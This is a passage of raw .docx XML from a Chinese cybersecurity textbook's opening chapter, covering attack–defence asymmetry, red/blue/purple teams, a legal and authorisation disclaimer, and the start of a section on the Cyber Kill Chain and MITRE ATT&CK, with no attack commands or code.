        <w:t xml:space="preserve">这种不对称性正是攻防博弈的核心特征。攻击者与防御者处于完全不同的成本结构与信息位置：攻击者只需发现并利用单个可利用漏洞（或脆弱配置），即可获得突破的入口；防御者则必须识别、评估并加固所有攻击面，同时不能过度影响业务可用性。攻击者可以自由选择攻击时间、攻击向量和攻击路径，在暗处进行侦察与武器化；防御者却需要全天候监控、实现对未知威胁的检测覆盖，并往往要在入侵发生后才获知自身已被突破。这种“非对称博弈”深刻塑造了网络安全领域的方法论：攻击方践行“假设突破”（Assume</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Breach），即承认边界防御不可能完美，转而强调内部横向移动检测、权限维持监测和快速响应；防御方则奉行“纵深防御”（Defense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Depth），通过多层控制点减缓攻击者进度，增加其成本，提高被发现的概率。也正因如此，有效理解攻击者的思维、技术、战术和过程（TTPs），就成为构建有效防御的前置条件——这正是本书坚持“攻防对称”教学理念的底层逻辑：先教如何攻，紧接着教如何防，二者如硬币之两面，不可偏废。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书《网络安全：从原理到靶机实战》的定位，即是在馆藏《从位到物联》已经扎实建立的“理解系统与协议”基础上，加入“攻防”这一层。具体而言，《从位到物联》网络卷（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）已讲授以太网帧结构、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存机制、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分片与路由、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机与拥塞控制、TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">握手与证书验证；系统卷（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）已讲授汇编指令、栈帧布局、进程虚拟内存空间、系统调用接口以及内核页表映射；密码学基础则在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中铺开（RSA、Diffie-Hellman、哈希、消息认证码）。本书将原封不动地复用这些知识，不再重复讲授网络包结构或栈帧细节，而是将其直接投入攻防视角：例如，ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗章节（卷二）会直接使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议的无状态响应特性，展示攻击机构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gratuitous ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施中间人，紧接着引入动态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测（DAI）及交换端口安全作为防御手段；基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列号预测的会话劫持讲解（卷三）会回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机，展示恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入，然后介绍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证选项（TCP-AO）和加密隧道保护的防御逻辑；缓冲区溢出利用（卷四）将在已知栈帧布局的前提下，以最小示例说明返回地址覆盖，并立即讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR、栈不可执行（NX）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Stack Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的缓解原理。如此，读者不需要在两套教材间来回跳跃：本书的“交叉回指框”统一标注所需前置章节，使攻防知识紧密嵌在已理解的系统机制之上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了在纷繁复杂的真实攻防生态中保持教学路径的清晰，本书将复杂的参与者与角色简化为红蓝二元模型，并引入紫队作为二者的协同层。红队（Red</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Team）执行授权模拟攻击，其目标不是破坏，而是通过模拟威胁行为体（Threat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Actor）的技战术，发现防御体系的盲区；蓝队（Blue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Team）负责监测、检测、响应与加固，运用日志分析、入侵检测系统（IDS）、端点检测与响应（EDR）及威胁情报，尽可能早地识别并阻断攻击链；紫队（Purple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Team）则是二者的桥梁，通过持续反馈将红队的发现迅速转化为蓝队的检测规则，再将蓝队捕获的异常行为反馈给红队以调整模拟策略，形成螺旋式的能力提升。本书在技术层面同样贯彻此二元协同：每个攻击技术节后，必定跟随一个“防御对照框”，明确列出该攻击的检测点（网络流量特征、系统日志印记、文件系统痕迹等）与修复方案（配置加固、补丁、架构改造），使得读者在学会“如何攻”的同时立刻掌握“如何守”。这一安排不仅是为满足授权渗透测试伦理要求，更是对职业道德的实操训练：只有理解攻击的机理与破坏性，才能设计出真正有效的防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须在此明确全书的法律与伦理边界——这是本书不可动摇的基石。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">：本书所有技术讲解、实操命令及靶机演练，仅限于读者自行搭建的隔离实验环境（详见第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章），或官方授权的渗透测试靶场（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hack The Box、TryHackMe、VulnHub、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方镜像等），或已取得书面授权的目标系统。严禁将书中任何技术应用于未获授权的生产系统、公网主机或他人资产。未经授权访问计算机系统属违法行为，可能触犯《刑法》第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 285 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">条、第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 286 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">条及相关法律法规。读者须确保实验网络与生产及互联网物理或逻辑隔离，所有操作在快照保护下进行。本书作者与出版社对任何滥用行为不承担法律责任。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该声明贯穿全书，每章涉及实操处均会重复提示，以严肃建立安全从业者的法律意识。任何攻击技术，均以防御为导向展开，绝不提供可用于绕过安全产品（AV/EDR）或破坏取证完整性的武器化代码；二进制漏洞利用部分仅限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别教学最小示例，且必须同步讲解现代缓解机制；坚决不收录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞或未公开攻击工具的实现细节。一言以蔽之：本书培养的是具备攻防双重视野的防御建设者与授权测试者，而非攻击武器的使用者。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进一步，本书以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架和网络杀伤链（Cyber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）作为整个知识体系的“坐标系”，将红队模拟、蓝队检测与紫队协同高效地结构化（详情见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的战术（Tactic）对应攻击的“为什么（Why）”——即攻击者试图达成的阶段性目标，如初始访问（Initial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Access）、执行（Execution）、持久化（Persistence）、横向移动（Lateral</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Movement）等；技术（Technique）则描述“怎么做（How）”——具体的技术手段，如利用公开漏洞（T1190）、钓鱼附件（T1566.001）、计划任务持久化（T1053.005）等。本书不会为具体技术编号提供固定的、可能随版本演进的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，而是注明该部分内容属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的大致战术类别，并标记“具体编号以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官网最新版本为准②”。网络杀伤链则给予一个时间线性视角：侦察→武器化→投递→利用→安装→命令与控制→目标行动，帮助读者在渗透测试项目中规划行动流程，或在防御时聚焦攻击链的早期阶段阻断。两个框架配合使用，既可作为攻击模拟的路线图，也可作为防御成熟度评估的参照基线。本书卷二至卷五的每一章，均会标注其在杀伤链和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中所处的位置，使读者时刻保持对宏观攻防图景的感知。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在攻防技能的习得路径上，本书遵循“原理→工具→靶机”三位一体的方法。原理层揭示漏洞存在的根本原因——即协议状态机、系统调用接口、内存管理或访问控制中的具体假设违反；工具层使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的真实安全工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap、Burp Suite、Metasploit、sqlmap、GDB、Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），提供精确的语法与参数，但所有环境相关值（IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址、端口号、文件路径、散列值）均使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VICTIM_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;HASH&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等占位符，避免编造不存在的精度②；靶机层则提供可复现的脆弱环境（Metasploitable、DVWA、VulnHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像等），确保读者能在隔离网络中安全地观察攻击现象、验证修复效果。每一步操作均要求先保存虚拟机快照，注明任何破坏性命令的风险，并提供常见排错指导。这种设计使得本书不仅是一本教科书，更是一份可执行的实验室手册，将理论知识与动手能力紧密结合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最后，本轮导引强调攻防对抗是一个动态演进的博弈过程，不存在一劳永逸的安全措施。然而，本书不追求跟踪前沿论文或年度威胁报告，而是致力于沉淀那些原理级、跨环境成立的核心知识——它们如同物理学定律一般，构成了攻防技术的基石。例如，栈溢出原理自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Aleph One </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的经典文章发表至今，其根本成因（函数调用时返回地址存储于栈上且无边界检查）未变，变化的只是利用技巧和缓解机制；SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入产生于字符串拼接构建查询的设计模式，只要程序仍然通过拼接用户输入构造结构化查询，该类漏洞就不会消失；而不安全的直接对象引用（IDOR）则源于依赖客户端不可信标识符作为授权判断，这在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RESTful API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设计中仍是常见反模式。掌握这些原理，再辅以本书提供的隔离靶场和攻击防御对照训练，读者将能建立起稳固的安全思维模型，足以应对不断变化的表面技术潮流。这便是本书在馆藏路线中的独特价值：它不是对《从位到物联》的替代，而是将其静止的“系统理解”升级为动态的“攻防理解”，是网络安全工程师从理论走向实战的安全地基。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="杀伤链与-attck攻击阶段地图"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK:攻击阶段地图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节正式展开对网络杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">两个核心模型的分析。在此之前，首先明确本书的使用边界与前置知识依赖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（全书贯穿）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节为无实操的框架性论述（标①、②），不涉及具体攻击命令或武器化技术。然而，本节介绍的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cyber Kill Chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架后续将被用于标注各章的授权攻击性技术。无论攻击手法在框架中处于何种阶段，读者必须严格遵循本书总纲：所有实际操作仅在读者自建的、与公网和生产网络完全隔离的孤立实验室内，或持有书面授权的目标范围内进行。未经授权访问他人系统属违法犯罪行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本书定位为《从位到物联》网络栈与系统栈的攻防升级卷。读者应已掌握《从位到物联》Ch24–25（以太网/ARP/MAC）、Ch26（IP/路由/NAT）、Ch27（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机与三次握手）、Ch28（TLS/防火墙/ACL）等网络基础，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch13–18（汇编/栈帧/进程地址空间/内存/系统调用）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CM5（数论与密码学基石）。本节不重讲上述基础，而是直接在协议与系统理解之上叠加“攻击阶段地图”这一分析维度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在网络安全的对抗博弈中，攻击者与防御者面临的核心困境之一，在于对“过程”认知的非对称性。对于攻击者而言，一次成功的入侵往往不是孤立的漏洞利用，而是一个环环相扣的精密序列——从初次刺探到最终达成目标，任何一环的断裂都可能导致行动的暴露或失败。美国洛克希德·马丁公司提出的网络杀伤链（Cyber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）概念，首次将这一序列抽象为一个逻辑自洽的七阶段模型，为攻击建模提供了一套通用的分析语言。需要指出，该模型是对实际攻击复杂性的线性简化，真实的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">APT（高级持续性威胁）行动可能存在阶段跳跃、反复循环或内网横向移动的非线性特征。与此相应，MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公司发展的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK（Adversarial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tactics, Techniques, and Common </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowledge）框架，则从一个不同的维度切入：它不再将攻击过程强行压入一条线性管道，而是构建了一个基于真实观测的“战术-技术”二维知识矩阵，从而将离散的攻击行为映射到一套结构化的坐标系中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节将深入剖析这两个框架的内在机理、关系与使用定位，并阐明它们如何作为全书各章节的“攻击阶段地图”贯穿始终，为后续的渗透测试方法论、靶机实操与蓝队检测映射提供统一的术语参照系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先，我们审视网络杀伤链的七阶段序列模型（标①概念模型）。杀伤链的直觉源于军事行动中对目标攻击流程的分解：一支进攻力量需要先识别目标、准备武器、投送武器、引爆战斗部、建立立足点、保持通信并最终达成战略目的。将这一逻辑迁移至网络空间，即形成了以下环环相扣的七个阶段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察（Reconnaissance）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者收集目标信息。这包括被动侦察，如通过搜索引擎、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录、WHOIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询、社交媒体搜集邮箱地址与组织架构；也包括主动侦察，如对目标外网主机进行端口扫描与服务探测，以识别开放端口和运行的应用版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">武器化（Weaponization）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者将恶意代码与一个可利用的漏洞载体结合，制作成可投递的武器。典型例子如将包含远程访问木马（RAT）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Office </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">宏文档与已知栈溢出漏洞（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
